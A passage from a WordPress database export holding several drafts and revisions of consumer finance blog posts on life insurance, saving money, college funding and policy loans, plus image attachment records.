src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/5-Good-Tips-Thought-bubble-Cropped-2866x2700-1-300x283.jpg\" alt=\"\" width=\"300\" height=\"283\" />5 Tips and Tricks to Finding Affordable Life Insurance</h3>\r\n<ol>\r\n 	<li>Choose the best life insurance policy for your situation. Understanding what you and your family needs is one of the first steps toward finding coverage. Consider your family’s unique set of needs and history, as well as all of your financial obligations. In doing so, you can help ensure that you select the right amount of coverage to fit your family’s needs while giving you the tools necessary to responsibly estimate the amount of coverage available for your financial situation.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Buy life insurance as early as possible. Life insurance may be significantly cheaper the younger you are when you purchase it. With increased age comes increased health risks, all of which can influence the premium rate of your policy. In fact, life insurance policy rates rise an average of eight to ten percent each year you put off applying.<sup>1</sup> To give yourself the best chance in finding a life insurance policy, buy early. This way you may be able to lock in the same premium rates you have at a younger age for the duration of the policy—saving you money for years to come.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Use quote websites wisely. One of the fastest ways to review what type of life insurance may best fit your financial situation is through the use of a quote website. Quote websites are particularly useful as they provide users with a quick and easy way to view their life insurance options and possible costs. Make sure your quote website compares quotes from multiple insurers to give yourself the best start!\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Consider a term life insurance policy—especially for those over 50 years of age. For those older in age, one may want to consider purchasing a term life insurance policy. A term life policy is often less expensive than a whole life insurance policy and typically only provides a death benefit in the event of the insured’s death so long as the death occurs during the duration of the policy.<sup>1</sup> However, despite term life policies lacking certain features associated with whole life it doesn’t mean that term life policies are bad. In fact, term life policies have long been a viable option for young people and older generations alike, and are well worth considering.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n 	<li>Work with an independent broker. Knowing how to get a life insurance policy is important, but so is recognizing when you need help in deciding on one. An independent broker can help inform you of life insurance products you should consider, provide valuable information on certain insurers, and help guide you through the process with ease. If you’re having trouble deciding on a policy—or just want some extra help—phoning your local, independent broker may be the best decision you make.</li>\r\n</ol>\r\nFinding life insurance doesn’t have to be difficult, but it does require a little bit of work. By following these five tips and tricks you can help improve your chances of finding the best life insurance policy to fit your needs without breaking the bank.\r\n\r\nRemember to do your research, weigh your options, compare your quotes wisely, and reach out for help when you need it most.\r\n\r\nYou can consult one of our licensed insurance professionals at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">email</a> us for more help determining the right type of coverage for you.\r\n\r\n<span style=\"font-size: 8pt;\"><em>Sources:\r\n</em></span><span style=\"font-size: 8pt;\"><em>1. Investopedia, How Age Affects Life Insurance Rates, 2019, <a href=\"https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/articles/personal-finance/022615/how-age-affects-life-insurance-rates.asp</a></em></span>','5 Tips For Finding Life Insurance That Fits Your Budget','','inherit','closed','closed','','419-revision-v1','','','2023-03-21 13:12:23','2023-03-21 13:12:23','',419,'http://cmdev-site1.com/?p=421',0,'revision','',0),(422,3,'2023-03-21 13:21:37','0000-00-00 00:00:00','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nStruggling to save money? It can be really hard, especially for those just starting out. It can still be just as hard though for those who have been trying for years and never seem to get ahead.\r\n\r\nThere are a few less talked about money-saving tips that can actually work for those that really want to save better ...\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Choose a better bank.</h3>\r\nDon’t stick with a bank that charges monthly fees or high ATM charges. Many banks have no monthly fees, free ATM transactions, and even attractive interest rates. Some banks will even offer bonuses or perks to new customers for opening accounts.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Watch less TV.</h3>\r\nThere can be some great money savings in watching less TV. Infomercials and commercials easily tempt people into impulse purchases. Watching less TV can help avoid that temptation and may lead to actual savings.\r\n\r\nIn addition, consider the actual monthly cost of TV. Choose a smaller cable package or utilize live-streaming services at a low monthly cost and cut off completely.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Sell stuff.</h3>\r\nCollections, keepsakes, and other random memorabilia can end up taking up space without adding much value. Consider getting some of the original investment back by selling it in a garage sale or online. Most people never miss their random collections, but always welcome the extra money.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Make gifts.</h3>\r\nBuying gifts at the store can soon add up to a lot of money, even sale items. Be creative and try making gifts instead. There is a wealth of ideas online for amazing homemade gifts at a price that won’t dent the budget.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Wait it out.</h3>\r\nMake it a practice to wait thirty days before making a big purchase. Waiting it out and giving it some thought can help people decide if they really need something and if they can truly afford it.','Money-Saving Tips That Actually Work','','draft','open','open','','','','','2023-03-21 13:21:37','2023-03-21 13:21:37','',0,'http://cmdev-site1.com/?p=422',0,'post','',0),(423,3,'2023-03-21 13:19:29','2023-03-21 13:19:29','Female hand putting a one dollar bill into a pink piggy bank','Piggy Bank savings','','inherit','open','closed','','piggy-bank-savings','','','2023-03-21 13:19:42','2023-03-21 13:19:42','',422,'http://cmdev-site1.com/wp-content/uploads/2023/03/saving-money-piggybank-1000x667-1.jpg',0,'attachment','image/jpeg',0),(424,3,'2023-03-21 13:20:28','2023-03-21 13:20:28','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nStruggling to save money? It can be really hard, especially for those just starting out. It can still be just as hard though for those who have been trying for years and never seem to get ahead.\r\n\r\nThere are a few less talked about money-saving tips that can actually work for those that really want to save better ...\r\n<h3>Choose a better bank.</h3>\r\nDon’t stick with a bank that charges monthly fees or high ATM charges. Many banks have no monthly fees, free ATM transactions, and even attractive interest rates. Some banks will even offer bonuses or perks to new customers for opening accounts.\r\n<h3>Watch less TV.</h3>\r\nThere can be some great money savings in watching less TV. Infomercials and commercials easily tempt people into impulse purchases. Watching less TV can help avoid that temptation and may lead to actual savings.\r\n\r\nIn addition, consider the actual monthly cost of TV. Choose a smaller cable package or utilize live-streaming services at a low monthly cost and cut off completely.\r\n<h3>Sell stuff.</h3>\r\nCollections, keepsakes, and other random memorabilia can end up taking up space without adding much value. Consider getting some of the original investment back by selling it in a garage sale or online. Most people never miss their random collections, but always welcome the extra money.\r\n<h3>Make gifts.</h3>\r\nBuying gifts at the store can soon add up to a lot of money, even sale items. Be creative and try making gifts instead. There is a wealth of ideas online for amazing homemade gifts at a price that won’t dent the budget.\r\n<h3>Wait it out.</h3>\r\nMake it a practice to wait thirty days before making a big purchase. Waiting it out and giving it some thought can help people decide if they really need something and if they can truly afford it.','Money-Saving Tips That Actually Work','','inherit','closed','closed','','422-revision-v1','','','2023-03-21 13:20:28','2023-03-21 13:20:28','',422,'http://cmdev-site1.com/?p=424',0,'revision','',0),(425,3,'2023-03-21 13:21:18','2023-03-21 13:21:18','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nStruggling to save money? It can be really hard, especially for those just starting out. It can still be just as hard though for those who have been trying for years and never seem to get ahead.\r\n\r\nThere are a few less talked about money-saving tips that can actually work for those that really want to save better ...\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Choose a better bank.</h3>\r\nDon’t stick with a bank that charges monthly fees or high ATM charges. Many banks have no monthly fees, free ATM transactions, and even attractive interest rates. Some banks will even offer bonuses or perks to new customers for opening accounts.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Watch less TV.</h3>\r\nThere can be some great money savings in watching less TV. Infomercials and commercials easily tempt people into impulse purchases. Watching less TV can help avoid that temptation and may lead to actual savings.\r\n\r\nIn addition, consider the actual monthly cost of TV. Choose a smaller cable package or utilize live-streaming services at a low monthly cost and cut off completely.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Sell stuff.</h3>\r\nCollections, keepsakes, and other random memorabilia can end up taking up space without adding much value. Consider getting some of the original investment back by selling it in a garage sale or online. Most people never miss their random collections, but always welcome the extra money.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Make gifts.</h3>\r\nBuying gifts at the store can soon add up to a lot of money, even sale items. Be creative and try making gifts instead. There is a wealth of ideas online for amazing homemade gifts at a price that won’t dent the budget.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Wait it out.</h3>\r\nMake it a practice to wait thirty days before making a big purchase. Waiting it out and giving it some thought can help people decide if they really need something and if they can truly afford it.','Money-Saving Tips That Actually Work','','inherit','closed','closed','','422-revision-v1','','','2023-03-21 13:21:18','2023-03-21 13:21:18','',422,'http://cmdev-site1.com/?p=425',0,'revision','',0),(426,3,'2023-03-21 13:34:00','0000-00-00 00:00:00','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nIf you have children who will soon be attending college, you likely know that the rate of college tuition has dramatically increased over time.\r\n\r\nRoom and board, supplies and books ... it adds up. The average college graduate has over $30,000 in student loan debt.<sup>1</sup>\r\n\r\nHaving a large amount of student loan debt can be a stress on college graduates for years to come. But, with proper planning and research, there are free money options available that you don’t have to repay.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Grants</h3>\r\nGovernment sponsored grants like Pell Grants are the most well-known. These, along with a variety of other state-specific grants, are designed to help financially-challenged students pay for higher education.\r\n\r\nYou generally need an idea of which schools you would like to apply to when you submit your grant application, and you also have the option to apply for the Pell Grant plus any supplemental grants you may qualify for.\r\n\r\nGo to <a href=\"https://www.fafsa.gov/\" target=\"_blank\" rel=\"noopener noreferrer\">www.fafsa.gov</a> to find out what your requirements may be.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Scholarships</h3>\r\nScholarships exist at a national, state, and local level. You can do a free search tailored just for you at <a href=\"https://www.scholarships.com/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.scholarships.com</a>.\r\n\r\nOne way that companies recruit future employees is to offer financial aid for college to those interested in a future career in that industry.\r\n\r\nSome professional organizations also offer industry-specific scholarships to those with an interest in the field. The best place to start your search for these scholarships is by finding out which companies do business in your local area.\r\n\r\nTheir websites often list financial aid opportunities. You can also get referrals through family and friends who work for companies that offer scholarships.\r\n\r\nSpecial scholarships may also be available from community and civic organizations like alumni clubs, church organizations, and sports groups.\r\n\r\nYou can start by looking up local rotary clubs, civic engagement organizations, and any sports or religious groups you may have an affiliation with. Being referred by a family member, friend or neighbor is helpful when it comes to connecting with what’s out there on a local level.\r\n\r\nFor more information about Life Insurance call one of our knowledgeable licensed agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\"><sup>1</sup> Project on Student Debt, 2017</span></em>','How To Get Free Money For College','','draft','open','open','','','','','2023-03-21 13:34:00','2023-03-21 13:34:00','',0,'http://cmdev-site1.com/?p=426',0,'post','',0),(427,3,'2023-03-21 13:29:53','2023-03-21 13:29:53','Student Loan Money Debt Education','Student Loan Money Debt Education-1000x667','','inherit','open','closed','','student-loan-money-debt-education-1000x667','','','2023-03-21 13:30:10','2023-03-21 13:30:10','',426,'http://cmdev-site1.com/wp-content/uploads/2023/03/Student-Loan-Money-Debt-Education-1000x667-1.jpg',0,'attachment','image/jpeg',0),(428,3,'2023-03-21 13:31:31','2023-03-21 13:31:31','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nIf you have children who will soon be attending college, you likely know that the rate of college tuition has dramatically increased over time. Room and board, supplies and books ... it adds up. The average college graduate has over $30,000 in student loan debt.<sup>1</sup>\r\n\r\nHaving a large amount of student loan debt can be a stress on college graduates for years to come. But, with proper planning and research, there are free money options available that you don’t have to repay.\r\n<h3>Grants</h3>\r\nGovernment sponsored grants like Pell Grants are the most well-known. These, along with a variety of other state-specific grants, are designed to help financially-challenged students pay for higher education.\r\n\r\nYou generally need an idea of which schools you would like to apply to when you submit your grant application, and you also have the option to apply for the Pell Grant plus any supplemental grants you may qualify for.\r\n\r\nGo to <a href=\"https://www.fafsa.gov/\" target=\"_blank\" rel=\"noopener noreferrer\">www.fafsa.gov</a> to find out what your requirements may be.\r\n<h3>Scholarships</h3>\r\nScholarships exist at a national, state, and local level. You can do a free search tailored just for you at <a href=\"https://www.scholarships.com/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.scholarships.com</a>. One way that companies recruit future employees is to offer financial aid for college to those interested in a future career in that industry.\r\n\r\nSome professional organizations also offer industry-specific scholarships to those with interest in the field. The best place to start your search for these scholarships is by finding out which companies do business in your local area.\r\n\r\nTheir websites often list financial aid opportunities. You can also get referrals through family and friends who work for companies that offer scholarships.\r\n\r\nSpecial scholarships may also be available from community and civic organizations like alumni clubs, church organizations, and sports groups.\r\n\r\nYou can start by looking up local rotary clubs, civic engagement organizations, and any sports or religious groups you may have an affiliation with. Being referred by a family member, friend or neighbor is helpful when it comes to connecting with what’s out there on a local level.\r\n\r\nFor more information about Life Insurance call one of our knowledgeable licensed agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\"><sup>1</sup> Project on Student Debt, 2017</span></em>','How To Get Free Money For College','','inherit','closed','closed','','426-revision-v1','','','2023-03-21 13:31:31','2023-03-21 13:31:31','',426,'http://cmdev-site1.com/?p=428',0,'revision','',0),(429,3,'2023-03-21 13:32:52','2023-03-21 13:32:52','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nIf you have children who will soon be attending college, you likely know that the rate of college tuition has dramatically increased over time.\r\n\r\nRoom and board, supplies and books ... it adds up. The average college graduate has over $30,000 in student loan debt.<sup>1</sup>\r\n\r\nHaving a large amount of student loan debt can be a stress on college graduates for years to come. But, with proper planning and research, there are free money options available that you don’t have to repay.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Grants</h3>\r\nGovernment sponsored grants like Pell Grants are the most well-known. These, along with a variety of other state-specific grants, are designed to help financially-challenged students pay for higher education.\r\n\r\nYou generally need an idea of which schools you would like to apply to when you submit your grant application, and you also have the option to apply for the Pell Grant plus any supplemental grants you may qualify for.\r\n\r\nGo to <a href=\"https://www.fafsa.gov/\" target=\"_blank\" rel=\"noopener noreferrer\">www.fafsa.gov</a> to find out what your requirements may be.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Scholarships</h3>\r\nScholarships exist at a national, state, and local level. You can do a free search tailored just for you at <a href=\"https://www.scholarships.com/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.scholarships.com</a>. One way that companies recruit future employees is to offer financial aid for college to those interested in a future career in that industry.\r\n\r\nSome professional organizations also offer industry-specific scholarships to those with interest in the field. The best place to start your search for these scholarships is by finding out which companies do business in your local area.\r\n\r\nTheir websites often list financial aid opportunities. You can also get referrals through family and friends who work for companies that offer scholarships.\r\n\r\nSpecial scholarships may also be available from community and civic organizations like alumni clubs, church organizations, and sports groups.\r\n\r\nYou can start by looking up local rotary clubs, civic engagement organizations, and any sports or religious groups you may have an affiliation with. Being referred by a family member, friend or neighbor is helpful when it comes to connecting with what’s out there on a local level.\r\n\r\nFor more information about Life Insurance call one of our knowledgeable licensed agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\"><sup>1</sup> Project on Student Debt, 2017</span></em>','How To Get Free Money For College','','inherit','closed','closed','','426-revision-v1','','','2023-03-21 13:32:52','2023-03-21 13:32:52','',426,'http://cmdev-site1.com/?p=429',0,'revision','',0),(430,3,'2023-03-21 13:33:36','2023-03-21 13:33:36','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nIf you have children who will soon be attending college, you likely know that the rate of college tuition has dramatically increased over time.\r\n\r\nRoom and board, supplies and books ... it adds up. The average college graduate has over $30,000 in student loan debt.<sup>1</sup>\r\n\r\nHaving a large amount of student loan debt can be a stress on college graduates for years to come. But, with proper planning and research, there are free money options available that you don’t have to repay.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Grants</h3>\r\nGovernment sponsored grants like Pell Grants are the most well-known. These, along with a variety of other state-specific grants, are designed to help financially-challenged students pay for higher education.\r\n\r\nYou generally need an idea of which schools you would like to apply to when you submit your grant application, and you also have the option to apply for the Pell Grant plus any supplemental grants you may qualify for.\r\n\r\nGo to <a href=\"https://www.fafsa.gov/\" target=\"_blank\" rel=\"noopener noreferrer\">www.fafsa.gov</a> to find out what your requirements may be.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Scholarships</h3>\r\nScholarships exist at a national, state, and local level. You can do a free search tailored just for you at <a href=\"https://www.scholarships.com/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.scholarships.com</a>.\r\n\r\nOne way that companies recruit future employees is to offer financial aid for college to those interested in a future career in that industry.\r\n\r\nSome professional organizations also offer industry-specific scholarships to those with an interest in the field. The best place to start your search for these scholarships is by finding out which companies do business in your local area.\r\n\r\nTheir websites often list financial aid opportunities. You can also get referrals through family and friends who work for companies that offer scholarships.\r\n\r\nSpecial scholarships may also be available from community and civic organizations like alumni clubs, church organizations, and sports groups.\r\n\r\nYou can start by looking up local rotary clubs, civic engagement organizations, and any sports or religious groups you may have an affiliation with. Being referred by a family member, friend or neighbor is helpful when it comes to connecting with what’s out there on a local level.\r\n\r\nFor more information about Life Insurance call one of our knowledgeable licensed agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\"><sup>1</sup> Project on Student Debt, 2017</span></em>','How To Get Free Money For College','','inherit','closed','closed','','426-revision-v1','','','2023-03-21 13:33:36','2023-03-21 13:33:36','',426,'http://cmdev-site1.com/?p=430',0,'revision','',0),(431,3,'2023-03-21 13:47:01','0000-00-00 00:00:00','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Mike Elman</span></div>\r\n<div class=\"article_info_bottom_line\"><span style=\"color: #ffffff;\">-</span></div>\r\n<h3>Borrowing Money from a Life Insurance Policy</h3>\r\nThough the primary focus of life insurance is to provide a benefit to the family of a lost loved one, some policies could add enhancements to a financial portfolio.\r\n\r\nIf you are familiar with life insurance, you may know the term “cash value,” or the ability to borrow from a policy if you have paid a certain amount of premiums.\r\n\r\nThis could be a temporary solution to financial emergencies, but it should require great consideration beforehand so you don’t put your investment at risk.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Can You Borrow Money From a Life Insurance Policy?</h3>\r\nNot all life insurance policies build cash value, such as a term life policy. Term life insurance rates are typically less expensive than whole life and offer just the death benefit, no cash value.\r\n\r\nHowever, a whole life or universal life insurance policy may offer a cash value benefit, which may allow you to take out a policy loan.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What are the Advantages and Disadvantages of a Policy</h3>\r\nBefore you jump in and take a loan out against a policy, consider if taking funds from your life insurance policy makes sense for your situation. In addition to weighing the pros and cons below, speak with your insurance company about how taking out a loan will impact your policy.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>Advantages:</h4>\r\n<ul>\r\n 	<li>No lengthy application process like other loans</li>\r\n 	<li>If you have built up cash value, you can borrow without a credit check</li>\r\n 	<li>Policy reports do not show up on your credit report unlike other loans</li>\r\n 	<li>Policy loans typically have lower interest rates</li>\r\n 	<li>Repay the loan on a schedule you set</li>\r\n 	<li>You can choose not to repay the loan and just deduct the amount due from the beneficiary’s benefit\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h4>Disadvantages:</h4>\r\n<ul>\r\n 	<li>Must have cash value built up which may take years from the policy start date</li>\r\n 	<li>Risk a reduced death benefit for your beneficiary if the loan is not repaid</li>\r\n 	<li>Risk losing your policy if the interest and unpaid loan amount total more than the remaining cash value\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>How Does a Policy Loan Work?</h3>\r\nWhen you borrow against your cash value from a life insurance policy, the insurance company uses the benefit as collateral.\r\n\r\nIn other words, if you pay back the loan plus interest in full, your policy benefit will go back to the original amount you bought it for.\r\n\r\nHowever, if you do not pay it back, the company will deduct the loan amount plus interest from the policy benefit.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>When Can You Take Out a Policy Loan?</h3>\r\nYou must build up the cash value before you can take out the money. Contact your life insurance representative and they will be able to tell you what your cash value is. You should also discuss how taking out the loan will impact your policy.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Should I Consider When Taking Out a Policy Loan?</h3>\r\nIf you do not want to jeopardize your life insurance policy, consider the following when taking out a loan.\r\n<ul>\r\n 	<li>How will taking out this loan impact my life insurance policy? Will I put my beneficiary’s death benefit at risk?</li>\r\n 	<li>Aside from the interest, are there any other fees or costs I need to know about?</li>\r\n 	<li>I should create a mock budget and schedule on how I will pay the loan back to ensure this is feasible.</li>\r\n</ul>\r\nBorrowing from a life insurance policy should be treated the same as taking out a loan from the bank – with due diligence.\r\n\r\nIt is important to remember the primary reason for a life insurance policy is to take care of your beneficiaries should something happen to you.\r\n\r\nHowever, emergencies happen, so having cash value available could be a huge help in financial adversity. Before taking out a policy loan, you should gather your research and consider every angle.\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.','Can You Borrow Money From A Life Insurance Policy?','','draft','open','open','','','','','2023-03-21 13:47:01','2023-03-21 13:47:01','',0,'http://cmdev-site1.com/?p=431',0,'post','',0),(432,3,'2023-03-21 13:43:55','2023-03-21 13:43:55','Cash in your jean pocket 100 dollar bills','Cash in your jean pocket 100 dollar bills 1000x667','','inherit','open','closed','','cash-in-your-jean-pocket-100-dollar-bils-1000x667','','','2023-03-21 13:44:26','2023-03-21 13:44:26','',431,'http://cmdev-site1.com/wp-content/uploads/2023/03/Cash-in-your-jean-pocket-100-dollar-bils-1000x667-1.jpg',0,'attachment','image/jpeg',0),(433,3,'2023-03-21 13:44:44','2023-03-21 13:44:44','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Mike Elman</span></div>\r\n<div class=\"article_info_bottom_line\"></div>\r\n<h3>Borrowing Money from a Life Insurance Policy</h3>\r\nThough the primary focus of life insurance is to provide a benefit to the family of a lost loved one, some policies could add enhancements to a financial portfolio.\r\n\r\nIf you are familiar with life insurance, you may know the term “cash value,” or the ability to borrow from a policy if you have paid a certain amount of premiums.\r\n\r\nThis could be a temporary solution to financial emergencies, but it should require great consideration beforehand so you don’t put your investment at risk.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Can You Borrow Money From a Life Insurance Policy?</h3>\r\nNot all life insurance policies build cash value, such as a term life policy. Term life insurance rates are typically less expensive than whole life and offer just the death benefit, no cash value. However, a whole life or universal life insurance policy may offer a cash value benefit, which may allow you to take out a policy loan.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What are the Advantages and Disadvantages of a Policy</h3>\r\nBefore you jump in and take a loan out against a policy, consider if taking funds from your life insurance policy makes sense for your situation. In addition to weighing the pros and cons below, speak with your insurance company about how taking out a loan will impact your policy.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>Advantages:</h4>\r\n<ul>\r\n 	<li>No lengthy application process like other loans</li>\r\n 	<li>If you have built up cash value, you can borrow without a credit check</li>\r\n 	<li>Policy reports do not show up on your credit report unlike other loans</li>\r\n 	<li>Policy loans typically have lower interest rates</li>\r\n 	<li>Repay the loan on a schedule you set</li>\r\n 	<li>You can choose not to repay the loan and just deduct the amount due from the beneficiary’s benefit\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h4>Disadvantages:</h4>\r\n<ul>\r\n 	<li>Must have cash value built up which may take years from the policy start date</li>\r\n 	<li>Risk a reduced death benefit for your beneficiary if the loan is not repaid</li>\r\n 	<li>Risk losing your policy if the interest and unpaid loan amount total more than the remaining cash value\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>How Does a Policy Loan Work?</h3>\r\nWhen you borrow against your cash value from a life insurance policy, the insurance company uses the benefit as collateral. In other words, if you pay back the loan plus interest in full, your policy benefit will go back to the original amount you bought it for.\r\n\r\nHowever, if you do not pay it back, the company will deduct the loan amount plus interest from the policy benefit.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>When Can You Take Out a Policy Loan?</h3>\r\nYou must build up the cash value before you can take out the money. Contact your life insurance representative and they will be able to tell you what your cash value is. You should also discuss how taking out the loan will impact your policy.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Should I Consider When Taking Out a Policy Loan?</h3>\r\nIf you do not want to jeopardize your life insurance policy, consider the following when taking out a loan.\r\n<ul>\r\n 	<li>How will taking out this loan impact my life insurance policy? Will I put my beneficiary’s death benefit at risk?</li>\r\n 	<li>Aside from the interest, are there any other fees or costs I need to know about?</li>\r\n 	<li>I should create a mock budget and schedule on how I will pay the loan back to ensure this is feasible.</li>\r\n</ul>\r\nBorrowing from a life insurance policy should be treated the same as taking out a loan from the bank – with due diligence.\r\n\r\nIt is important to remember the primary reason for a life insurance policy is to take care of your beneficiaries should something happen to you.\r\n\r\nHowever, emergencies happen, so having cash value available could be a huge help in financial adversity. Before taking out a policy loan, you should gather your research and consider every angle.\r\n\r\nBe sure to consult one of our licensed Insurance Agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:Info@JSuttonFinancial.com\" target=\"_blank\" rel=\"noopener\">Info@JSuttonFinancial.com</a>.','Can You Borrow Money From A Life Insurance Policy?','','inherit','closed','closed','','431-revision-v1','','','2023-03-21 13:44:44','2023-03-21 13:44:44','',431,'http://cmdev-site1.com/?p=433',0,'revision','',0),(434,3,'2023-03-21 13:45:38','2023-03-21 13:45:38','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Mike Elman</span></div>\r\n<div class=\"article_info_bottom_line\"><span style=\"color: #ffffff;\">-</span></div>\r\n<h3>Borrowing Money from a Life Insurance Policy</h3>\r\nThough the primary focus of life insurance is to provide a benefit to the family of a lost loved one, some policies could add enhancements to a financial portfolio.\r\n\r\nIf you are familiar with life insurance, you may know the term “cash value,” or the ability to borrow from a policy if you have paid a certain amount of premiums.\r\n\r\nThis could be a temporary solution to financial emergencies, but it should require great consideration beforehand so you don’t put your investment at risk.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Can You Borrow Money From a Life Insurance Policy?</h3>\r\nNot all life insurance policies build cash value, such as a term life policy. Term life insurance rates are typically less expensive than whole life and offer just the death benefit, no cash value. However, a whole life or universal life insurance policy may offer a cash value benefit, which may allow you to take out a policy loan.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What are the Advantages and Disadvantages of a Policy</h3>\r\nBefore you jump in and take a loan out against a policy, consider if taking funds from your life insurance policy makes sense for your situation. In addition to weighing the pros and cons below, speak with your insurance company about how taking out a loan will impact your policy.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>Advantages:</h4>\r\n<ul>\r\n 	<li>No lengthy application process like other loans</li>\r\n 	<li>If you have built up cash value, you can borrow without a credit check</li>\r\n 	<li>Policy reports do not show up on your credit report unlike other loans</li>\r\n 	<li>Policy loans typically have lower interest rates</li>\r\n 	<li>Repay the loan on a schedule you set</li>\r\n 	<li>You can choose not to repay the loan and just deduct the amount due from the beneficiary’s benefit\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h4>Disadvantages:</h4>\r\n<ul>\r\n 	<li>Must have cash value built up which may take years from the policy start date</li>\r\n 	<li>Risk a reduced death benefit for your beneficiary if the loan is not repaid</li>\r\n 	<li>Risk losing your policy if the interest and unpaid loan amount total more than the remaining cash value\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ul>\r\n<h3>How Does a Policy Loan Work?</h3>\r\nWhen you borrow against your cash value from a life insurance policy, the insurance company uses the benefit as collateral. In other words, if you pay back the loan plus interest in full, your policy benefit will go back to the original amount you bought it for.\r\n\r\nHowever, if you do not pay it back, the company will deduct the loan amount plus interest from the policy benefit.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>When Can You Take Out a Policy Loan?</h3>\r\nYou must build up the cash value before you can take out the money. Contact your life insurance representative and they will be able to tell you what your cash value is. You should also discuss how taking out the loan will impact your policy.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>What Should I Consider When Taking Out a Policy Loan?</h3>\r\nIf you do not want to jeopardize your life insurance policy, consider the following when taking out a loan.\r\n<ul>\r\n 	<li>How will taking out this loan impact my life insurance policy? Will I put my beneficiary’s death benefit at risk?</li>\r\n 	<li>Aside from the interest, are there any other fees or costs I need to know about?</li>\r\n 	<li>I should create a mock budget and schedule on how I will pay the loan back to ensure this is feasible.</li>\r\n</ul>\r\nBorrowing from a life insurance policy should be treated the same as taking out a loan from the bank – with due diligence.\r\n\r\nIt is important to remember the primary reason for a life insurance policy is to take care of your 